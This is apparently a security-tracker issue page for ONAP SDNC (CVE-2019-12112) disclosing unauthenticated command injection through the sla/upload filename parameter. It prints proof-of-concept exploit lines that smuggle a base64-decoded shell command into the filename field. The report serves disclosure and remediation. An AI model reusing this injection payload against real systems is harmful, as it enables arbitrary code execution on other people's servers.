Uploaded image for project: 'ONAP JIRA Security Issues'
  1. ONAP JIRA Security Issues
  2. OJSI-199

SDNC service allows for arbitrary code execution in sla/upload form (CVE-2019-12112)

CloneClone+Clone++
    XMLWordPrintable

Details

    Description

      SDNC allows any user for arbitrary code execution in upload form.
      Sample payload below.

      Path: oam/admportal/server/router/routes/sla.js:149

      Url: http://<IP>:30201/sla/upload

      Exploit: touch '|| echo L3RtcC9kZ1VwbG9hZA== | base64 -d | xargs touch #'
      Exploit: http -f 'http://<IP>:30201/sla/upload' filename@||\ echo\ L3RtcC9kZ1VwbG9hZA\=\=\ |\ base64\ -d\ |\ xargs\ touch#

      Impact description (draft)

      Title: SDNC service allows for arbitrary code execution in sla/dgUpload form

      Reporter: Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung

      Products: SDNC

      Affects: Casablanca and earlier

      Description:

      Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung  reported a vulnerability in SDNC.. By executing sla/upload with a crafted filename parameter an unauthenticated attacker can execute arbitrary command. All SDC setups which includes admportal are affected.

      Note:

      Dublin release is not vulnerable for this attack because the admportal has been disabled but the code itself is still vulnerable.

       

      Attachments

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

        Activity

          People

            arotundo Alfred Rotundo
            kopasiak Krzysztof Opasiak
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: